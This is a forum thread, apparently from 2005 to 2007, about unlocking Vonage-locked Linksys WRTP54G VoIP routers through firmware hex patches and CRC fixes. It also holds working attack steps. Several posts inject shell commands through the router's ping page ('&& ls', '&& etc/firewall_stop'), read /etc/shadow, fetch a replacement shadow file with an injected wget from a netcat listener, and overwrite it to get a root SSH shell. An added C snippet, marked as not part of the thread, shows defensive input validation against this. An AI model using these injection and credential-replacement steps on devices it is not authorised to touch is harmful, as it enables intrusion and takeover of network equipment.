WRTP54G Unlocked?

Discussion in 'Other Linksys Equipment' started by rfv3, Jul 18, 2005.

  1. KillaB

    KillaB Network Guru Member

  2. mazilo

    mazilo Network Guru Member

    Go to the DSLR VoIP forum and do a search there to find out how to unlock your unit.
  3. rfv3

    rfv3 Network Guru Member


    I know I've been gone for a minute, but any guesses as to what a "WRTP54G-NA" might be? Check out the downloads on linksys.com and then select this model router. From there read the data sheet... compare the data sheet for this to other WRTP54G-?? models and you'll see that this one does not have any provider listed on it (page 2 lower right). Hmm.... if I didn't decide to try Vonage I'd be quick to try this out (for those who are wondering, Vonage sucks compared to Skype... at least with my crappy connection).

  4. rfv3

    rfv3 Network Guru Member

    ... As I was saying

    Yes, I know the router itself has been out for a while but it looks like Linksys just recently posted the firmware for download :)
  5. rfv3

    rfv3 Network Guru Member

    WRTP54G Pwn3d!

    Now the thread title is official :). I've ping hacked my router and replaced the firmware :D (this is actually two different things, don't get them confused)

    As always, use this information at your own risk.

    Ping Hack:
    Okay, so ping hack is freak'n easy. First, I'm pretty sure I tried this with the latest firmware, but if you need, here is a page to download various versions:

    Just go to the ping page and say you want to ping the following address: && ls

    Let the ping window refresh (about 5 seconds) and check the output. So, now you can run small commands from the browser (just substitute 'ls' for the command of choice: ps, etc.).

    So, all is good; you can pretty much own your box from here (use dropbear or wget telnetd a shell). BUT, IF YOU WANT TO OPEN PORTS, run this command: && etc/firewall_stop

    Now you can open any service on any port :)

    Okay, so now you own the box. (Finally). I honestly don't know enough about the configuration of dropbear to set it up so that I can ssh in, but I imagine you'd create a config file in the var folder and then launch dropbear with the option to load its config from there. Any takers on howto?

    FINALLY, the WRTP54-G is finally unlocked. The above lets you get in and access the prompt, but what if you want to actually use your own VOIP provider? Say bye bye to vonage and hello to new firmware :).

    New firmware:

    First, grab the 3.1.17 firmware for the WRTP54G-NA from http://www.linksys.com and Tiny Hexer from http://www.mirkes.de .

    Second, change only the following (use the top header/left column as a guide):
              0001 0203 0405 0607 0809 0A0B 0C0D 0E0F
        0X10            4359 574C
    0X3B0000  23DE 53C4 1545 243C
    Third, upload new firmware at . (For more help see: http://wiki.openwrt.org/OpenWrtDocs/Hardware/Linksys/WRTP54G )

    Last, you may want to do a hard-reset (hold the reset button until the nvram clears). This should be optional, but it can't hurt.

    Note: Even though the new firmware isn't locked down to Vonage, it is locked down as far as SSH goes :( . The ping hack should work with this firmware as well, but to be honest I forget. If you want to switch back to the old firmware, you follow the same procedures, just load the old image. (you may have to set a SIP password on the SIP page and use it instead of the tivonpw password)

    Hopefully with some support at dd-wrt we can get the box truly open.

    It's been fun, and good luck with future hacking.


    PS: Sorry for typos, and bad spelling, it's late and I'm having to use a web-cafe without a spell-checker.
  6. rmanaka

    rmanaka LI Guru Member

    Great post!

    The CRC bytes at the end seem to be the same as the original .img and not a new CRC based upon the CYWM->CYWL patch. My upload of the patched .img bails out with a BAD CRC error accordingly. :frown:

    Have you calculated good CRC values that should be patched or am I missing something?

    I'm hoping to get my unit registered on Voicepulse's Open Access plan...right now it won't register as the Caller ID Number field (using 1.00.62-NA) won't pass a letter (s123456789) that seems to be required for Voicepulse registration...s123456789 is actually my username at VP, but the registration process won't work in my 1.00.62-NA loaded Vonage WRTP54 unless there is something in the Caller ID Number! I hope that this version of firmware fixes that problem and allows me to register Line 1 at Voicepulse.

  7. rmanaka

    rmanaka LI Guru Member

    A good CRC for rfv3's post...

    rcilink in the following post calculated a good CRC value for the Linksys 3.1.17 firmware... http://www.dslreports.com/forum/remark,15847480~days=9999~start=200

    the last four bytes should be: AB 3A 49 5D

    he also calculated an MD5 for the firmware after the patches: 611eb9063d2c9c8ff2e34826c1a376e2

    Thank you all. I now have an exVonage WRTP54G registered with Voicepulse!!!
  8. bombel

    bombel LI Guru Member

    hi there

    is there anyone who wants to write the "step by step guide how to unlock vonage only WRTP54G" for me ? :p

    maybe rmanaka ?
  9. celiomartins

    celiomartins LI Guru Member

  10. humvee

    humvee LI Guru Member

    I have just bought a Linksys WRTP54G-AU; it has the unlocked AU/NZ firmware. I would like to back it up, so I can post it here and other places for people who currently have a locked down version of the firmware, and also so when I start playing around with my firmware I can get back to my current firmware. I know I have seen a way posted somewhere that did it from the cmd line but I cannot find it now. I am very familiar with routers and networking and Windows but am relatively new to Linux so any guides would be great. I am also keen to try the likes of OpenWrt or similar. If anyone has run this on a WRTP54G it would be good to hear from you.
  11. stryton

    stryton Guest

    Sorry, I'm new here, but after finding this website I joined. I have the WRTP54G with Vonage with firmware version 1.00.62.

    Is it possible to hack this? Also, are there any advantages to this?
  12. humvee

    humvee LI Guru Member

    There are different levels of 'hacking' routers. I believe some have been achieved for this router (e.g. changing the SIP provider); some have not (e.g. replacing the firmware with one that allows better QoS, VPNs, increasing wireless power).

    The main reason for doing the first option is to be able to choose a SIP/VoIP provider other than Vonage.
  13. mazilo

    mazilo Network Guru Member

    To find out your answer, start reading all posts in this thread to find out, particularly articles posted after 6/2006.
  14. humvee

    humvee LI Guru Member

    New hidden page found

    I found this by changing the end of the URL from wireless%2Fwireless_setup.html to SysInfo.htm on my router. This gives an output of
    Vendor:LINKSYS Model Name:WRTP54G Firmware Version:3.1.17.ETSI, 20060704114526 #:000 Boot Version: CodePattern:CYWM CodeWorkspace:IMAGE_B Country:EU RF Status:Enable RF Firmware Version: RF SSID:XX -----Dynamic Information RF Mac Address:00:18:XX:XX:83:58 Device Mac Address:00:18:39:51:83:56 WAN Mac Address:00:18:XX:XX:83:57 Hardware Version:1.00.03 .


    Also, the ping hack does NOT work on my router; in fact the entire ping section does not work.
  15. rmanaka

    rmanaka LI Guru Member

    Same here...

    Same here...ping section does not work. My output is as follows:
    Vendor:LINKSYS Model Name:WRTP54G Firmware Version:3.1.17, 20060704120438 #:000 Boot Version: CodePattern:CYWL CodeWorkspace:IMAGE_A Country:NA RF Status:Disable RF Firmware Version:N/A RF SSID:xxxxxxx -----Dynamic Information RF Mac Address:00:13:XX:XX:XX:36 Device Mac Address:00:XX:XX:XX:F3:34 WAN Mac Address:00:13:XX:XX:XX:35 Hardware Version:1.00.03

    Interesting that the CodeWorkspaces are different!
  16. bombel

    bombel LI Guru Member

    ok, now unlocking wrtp54g (vonage only) is not a problem.
    i have had firmware 1.00.62

    cyt 3.5 (3.9 doesn't work) ( http://www.bargainshare.com/index.php?showtopic=87504&st=0 ) + modified firmware from http://celiom.googlepages.com/linksys

    quick instruction:
    0. download CYT3.5 and wrtp54g_fw_3.1.17_USmod.img from links above
    1. disable all firewalls
    2. log into as admin/admin , and don't close this window
    3. run CYT 3.5 software and hit '1'. wait a minute...
    4. go to "Administration -> firmware upgrade ", login as Admin/Admin (or Admin/ , i don't remember)
    5. load the modified firmware and go buy a beer ;)

    5 minutes and i have it unlocked :)

    i bought it on ebay for 39$+11$ . in Poland the version wrtp54g-eu costs about 560zl = 175$ (1$=3.20zl)
    the only one difference is in US software there are wifi channels 1-11 , but in eu version 1-13.

    thanks for all people who made it possible to unlock
  17. daiyan

    daiyan Guest

    Hi there, I am trying to unlock the WRTP54G, but I am not able to do so.
    Can we unlock earthlink version on WRTP54G?
  18. samir77

    samir77 Guest

    Hey bombel what kinda of power supply are u using? are you using the original 110 power adapter or international 110~240V AC power adapter?

    If you are using 240V power adapter can you provide details of the adapter i.e., manufacturer, where did u buy it and is it working fine with ur router etc...

    Thank you.
  19. xtremcub

    xtremcub Guest

    Using CYT, TFTP, RC4 I have the decrypted tiMAC.xml off my WRTP54G-VA which shows the Adminpw (XrYKelfxxx) along with the userpw (tivonpw)

    Went to the admin page to login as Admin with the Xr password and no dice.


    Have tried to update the firmware a couple of times with varying results, logging in with my admin and then opening another window to the update firmware page, using CYT and logging in as Admin/admin then trying to load new firmware, made it to 100% and then the page never refreshed and eventually timed out, I reset the router, currently the firmware is at 1.00.62 and the voice tab is still locked. Haven't tried pulling down and decrypting the tiMAC.xml file again to see if the adminpw line has changed.
  20. mtennant

    mtennant Guest

    new wrtp54g firmware released



    Does anyone have the expertise to figure out the new CRC for this file so it can be loaded on a Vonage version of this router that has been unlocked and running 3.1.17?
  21. stangri

    stangri LI Guru Member

    Yes, I've modified the file per instructions on the dslreports forums and flashed my initially locked Vonage unit (was first flashed with 3.1.17US mod and then 3.1.22EU mod) and it seems to be working fine (for a few hours).
  22. Maxwell2000

    Maxwell2000 Guest

    I cannot unlock my RTP 300


    I am desperate and tried it all. Is there anybody else who did not manage to unlock its RTP 300? Or am I the only one. I am just wondering if there is a possibility that it cannot be unlocked or if there always is a way and I have not found it yet.

    Thank you for your help.
  23. OG1502

    OG1502 Guest

  24. eosirl

    eosirl Guest

    Sorry, no help, just to let you know that I am in the same boat. I have Vonage firmware 5.01.04 and it is relatively new, so no passwords floating around. I tried Cyt to reset the passwords but it failed when it tried to do XML provisioning of the unit.

    So anyone out there who can help and want to help, we both would appreciate the help.

  25. jrebeiro

    jrebeiro Guest

    I'm in the same boat as well. 5.01.04 killed my router. It can no longer be connected to the internet. When it is connected the router constantly reboots. Vonage won't give me the password to get to the firmware page so I can downgrade. This should be illegal! I paid $169 for this stupid thing last year and they completely broke it, won't send me a new one, and want to send me some Motorola replacement.

    I don't want a Motorola I want my Linksys device back. And I want my phone service back. It's been a month!

    Anyone who can get me a password or who knows how to get CYT working I would greatly appreciate it!
  26. PingHack

    PingHack Guest


    I have a problem with unlocking WRTP54G 1.00.62 (Vonage).
    CYT in any version is not working.
    I have ping access but I don't know what I am able to do with it.

    I see etc\passwd & etc\shadow with the Admin hash key, but brute force hacking is very time-consuming.
    I can create a file by "echo a > \var\t" but a zero-length file is created and the string "a" is shown in the box.

    While I haven't got the Admin pass I can't create/modify files by SSH access. (dropbear is working, it is switchable in the web interface)

    I was stopped at this step in rfv3's procedure:
    "Okay, so now you own the box. (Finally)"

    Please, give me hints.
  27. mnc1234

    mnc1234 Guest

    Newbie question

    I just bought the WRTP54G at Compusa. I wanted a Wireless-G device and the rep there said that this would be the same as a WRT54G which was $40 more. I have no interest in using it for VOIP.

    I hooked it up and it seems to work fine. However, I am concerned after reading this thread whether this router (and my home computers) can be accessed through the VOIP part that I don't use.

    Thanks for any help.
  28. pablito

    pablito Network Guru Member

    Unlocked WRTP for $40 at TigerDirect

    I just picked up a WRTP54G from Tiger Direct (Canada) for $37. They had about 100 of them in remanufactured boxes. Works a treat if you understand all the options. I set it up against my Asterisk server and it works. For $40 I can buy an armload and not worry about the silly Vonage crap and unlocking....

  29. UnaCoder

    UnaCoder Networkin' Nut Member

    Hey Kiddies,

    Props to Rob for finding the ping hack. That was the magic I was looking for. After a few hours of toiling away at the uber limited ping prompt, I finally figured out a way to change the Admin account password so that I could SSH into my WRTP54G.

    Since it's 4:15am, and I work in a few hours, I'm going to be brief. I hacked my wrtp54g from my macbook pro, using a handful of little utilities.

    First things first. I needed a new password for the Admin account. I figured password updating utilities on the router itself would be ... limited ... without real console IO, so I generated my password hash from my laptop first, and created a drop-in replacement for the shadow file.

    I wrote a small C program on my mac to generate the password hash using the crypt library:

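    $ cat crypt.c
    #include <string.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <unistd.h>   /* declares crypt() on macOS; Linux needs <crypt.h> and -lcrypt */

    int main(int argc, char **argv) {
        if (argc != 2) {
            printf("Bailing...\n");
            exit(1);
        }
        char *password = argv[1];
        char buffer[1024];   /* a char array, not an array of pointers */

        printf("Hashing: %s\n", password);
        /* "aa" is the two-character salt for traditional DES crypt */
        strncpy(buffer, crypt(password, "aa"), sizeof(buffer) - 1);
        buffer[sizeof(buffer) - 1] = '\0';   /* strncpy does not guarantee termination */
        printf("Encrypted string: %s\n", buffer);
        return 0;
    }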


    then compiled it:
    $ gcc -o crypt crypt.c
    then created a hash:
    $ ./crypt blah
    Hashing: blah
    Encrypted string: aaa1LSHpEdWOI

    OK, now that we got that out of the way, we need to figure out a way to get this onto the router.

    There is probably more than one way to do this, and I'm sure my method was the most painful possible, but it was the first one I got to work.

    So, from the Administration -> Diagnostics -> Ping window, I first cleared the firewall rules (thanks rob!) && /etc/firewall_stop

    note: once you do this you'll notice your internet connection stops working (if you're using the router at the same time as making these changes). Balls! the firewall was also configured to handle the routing of your precious packets! (we'll fix it temporarily later).

    Next, I used the netcat program 'nc' on my laptop to simulate being an http server:

    $ sudo nc -l 80

    that will run netcat in tcp listen mode on port 80.

    THEN, during my arduous digging around in the filesystem of the router I discovered it was equipped with 'wget'. Thanks linksys! My IP on the local wlan network was, so I pointed wget at my laptop's ip and it made a connection to netcat! oh joy! However I discovered that most of the file system is read-only, and that you need to write to somewhere in /var. I also discovered that /etc/shadow is a mere symlink to /var/tmp/shadow, so i decided i would plop my replacement shadow file right there.

    Before I dive into how I did that, let's see what was in the original shadow file:


    Well now, there's a nicely hashed password set by linksys that would take around 200 years to crack, how about we just get rid of it instead?

    As you recall from earlier, my hashed password "blah" is "aaa1LSHpEdWOI", so let's just substitute that in for the existing hash. I did this in notepad and kept it by my terminal where netcat was running for easy pasting.

    new shadow file contents (soon to be):

    OK. So now for the FUN stuff. We have to trick wget into thinking that we are a real web server (while our noses are growing long). How do we do this? Well I happen to know a bit about the HTTP protocol, so this wasn't too tricky for me. If you want to learn the HTTP protocol, I suggest starting with WikiPedia, and then graduating to something more serious like the actual RFC, but for now I'll let you cheat.

    SO, in the PING console on my wrtp54g, I ran the following command: && wget -O /var/tmp/blah

    Once I hit the Ping! button, sure enough WGET connected to my eager netcat server.

    It looked something like this:

    $ sudo nc -l 80 ( <<< this was the command to start netcat)
    GET /blah HTTP/1.0 (<<< here is wget asking for /blah like above)
    User-Agent: Wget/1.9.1
    Accept: */*
    Connection: Keep-Alive

    So, now that wget is connected to netcat, and asking for our file, we need to send it back a response. Here is a mocked up HTTP/1.0 response that I simply pasted back to netcat:

    HTTP/1.0 200 OK


    Then I tapped Control+D to signal the end of the file, and wget saved my fake shadow file right where I need it.

    Next, I copied it over the existing shadow file as follows (from the ping window again): && cp /var/tmp/blah /var/tmp/shadow

    Then just to be certain that it worked, i cat'ted the file: && cat /var/tmp/shadow

    and SWEET, my new password hash was in place!

    I used the following SSH command to login:

    $ ssh -a -o "PreferredAuthentications password" -l Admin

    the extra stuff was to speed up the connection a bit, since trying agent forwarding or ssh key auth was taking like 5 minutes before i got a password prompt....

    After I logged in, i was greeted with a busybox root shell:

    $ ssh -a -o "PreferredAuthentications password" -l Admin
    Admin@'s password:

    BusyBox v0.61.pre (2007.02.15-01:05+0000) Built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    # export PS1="owned# "


    Now let's get those packets flowing again by re-enabling iptables MASQUERADING:

    owned# iptables -t nat -A POSTROUTING -i eth0 -j MASQUERADE

    now my internets were back and I was able to write this post =D

    Next thing i need to figure out is how to make the shadow file persistent (ie, saved across reboots...) I'm sure there's a flash device in there somewhere I need to poke. I'll keep ya'll posted.
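
Added example, not part of the original thread and not Linksys code: the ping hack in rfv3's post and UnaCoder's use of it above both rely on the diagnostics page letting text typed after the address reach a shell. The C sketch below shows the defensive counterpart, validating the target and running ping with a fixed argument vector; the function names, the /bin/ping path and the sample address and hostname are assumptions.

```c
/* Added example: hardened ping-target handling for a router diagnostics page.
 * The firmware's own handler is not shown in the thread; names are hypothetical. */
#include <arpa/inet.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Accept only an IPv4 literal or a hostname built from [A-Za-z0-9-] labels.
 * Spaces, '&', ';', '|', '/', '$' and backticks are rejected, and so is a
 * leading '-' that ping could read as an option. */
int is_valid_ping_target(const char *s)
{
    struct in_addr addr;
    size_t len, i, label = 0;
    if (s == NULL || (len = strlen(s)) == 0 || len > 253) return 0;
    if (inet_pton(AF_INET, s, &addr) == 1) return 1;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            if (label == 0 || s[i - 1] == '-') return 0; /* bad label edge */
            label = 0;
        } else if (isalnum(c) || (c == '-' && label > 0)) {
            if (++label > 63) return 0;                  /* label too long */
        } else {
            return 0;                                    /* shell syntax etc. */
        }
    }
    return label > 0 && s[len - 1] != '-';
}

/* Run ping with a fixed argv through fork/execv, so no shell parses the input.
 * Returns ping's exit status, or -1 if the target is rejected or on error. */
int run_ping(const char *target)
{
    pid_t pid;
    int status;
    if (!is_valid_ping_target(target)) return -1;
    if ((pid = fork()) < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "4", (char *)target, NULL };
        execv("/bin/ping", argv);            /* path is an assumption */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs; the last two are the strings quoted in the thread. */
    const char *in[] = { "192.168.15.1", "voip.example.net",
                         "&& ls", "&& /etc/firewall_stop" };
    for (size_t i = 0; i < sizeof in / sizeof in[0]; i++)
        printf("%-24s %s\n", in[i], is_valid_ping_target(in[i]) ? "accept" : "reject");
    return 0;
}
```

Validation alone is not the whole fix: passing the value as a single argv element keeps it out of a shell even if the allow-list is later loosened.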

  30. UnaCoder

    UnaCoder Networkin' Nut Member

    Well he didn't quite give you enough to own the box, but he did show you that the window was unlocked... I just spent a few hours figuring this out and put instructions in my post:


    let me know if it doesn't make sense... it's a bit complicated
  31. [XP1]

    [XP1] Networkin' Nut Member

    If the Linksys WRTP54G and the D-Link VTA-VR are similar, then you can modify the "/etc/config.xml" adminpwd_crypt: "<adminpwd_crypt>AB/PLgjMdnCMg</adminpwd_crypt>"

    That's what I did to set the admin password on my D-Link VTA-VR.

    You will have to unpack the firmware, modify, and then repack it.